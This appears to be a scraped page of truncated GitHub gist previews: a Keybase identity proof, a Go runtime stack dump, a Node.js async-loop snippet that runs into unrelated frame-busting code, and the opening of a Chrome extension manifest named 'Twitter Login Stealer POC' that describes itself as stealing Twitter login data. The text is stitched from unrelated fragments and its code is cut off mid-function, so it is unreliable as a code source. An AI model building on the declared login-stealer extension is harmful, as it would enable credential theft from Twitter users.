I hereby claim:
- I am skepticfx on github.
- I am skepticfx (https://keybase.io/skepticfx) on keybase.
- I have a public key ASDBQHK-W1-359jnXLUrplIYc09wcdzgckEiuhgfBz3JEgo
To claim this, I am signing this object:
runtime: unexpected return pc for runtime.sigpanic called from 0xc000941878 | |
stack: frame={sp:0xc000941788, fp:0xc0009417d8} stack=[0xc00093e000,0xc000942000) | |
0x000000c000941688: 0x000000c000941690 0x0000000000434fa0 <runtime.addOneOpenDeferFrame.func1+0x0000000000000000> | |
0x000000c000941698: 0x000000000044c3f6 <runtime.sigpanic+0x0000000000000336> 0x000000c000941788 | |
0x000000c0009416a8: 0x000000c0005cd1e0 0x0000000000000000 | |
0x000000c0009416b8: 0x000000c000941778 0x0000000000435766 <runtime.gopanic+0x0000000000000106> | |
0x000000c0009416c8: 0x0000000000000036 0x000000c000d21840 | |
0x000000c0009416d8: 0x06400000d46b3400 0x000a0202000a8af6 | |
0x000000c0009416e8: 0xd768fbdc26126402 0x1080587a51d277d2 | |
0x000000c0009416f8: 0x01010000b0705119 0x2638d4e7b8960a08 |
I hereby claim:
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
// Looping asynchronous stuff synchronously | |
// Lets say you have to do some asynchronous stuff, say scan() 'n' number of times but only synchronously in node.js | |
// You may end up doing this anti-pattern in node.js, because of performance and other stuffs. | |
var iterate = function(args, callback){ | |
finish = 0; | |
loop(args, 0); | |
if (top!=self){ | |
top.location.href=self.location.href; | |
} |
{ | |
"name": "Twitter Login Stealer POC", | |
"version": "1.0", | |
"description": "Steals the login data from Twitter", | |
"browser_action": { | |
"default_title": "Twitter Stealer" | |
}, | |
"permissions": [""], | |
"content_scripts": [{ |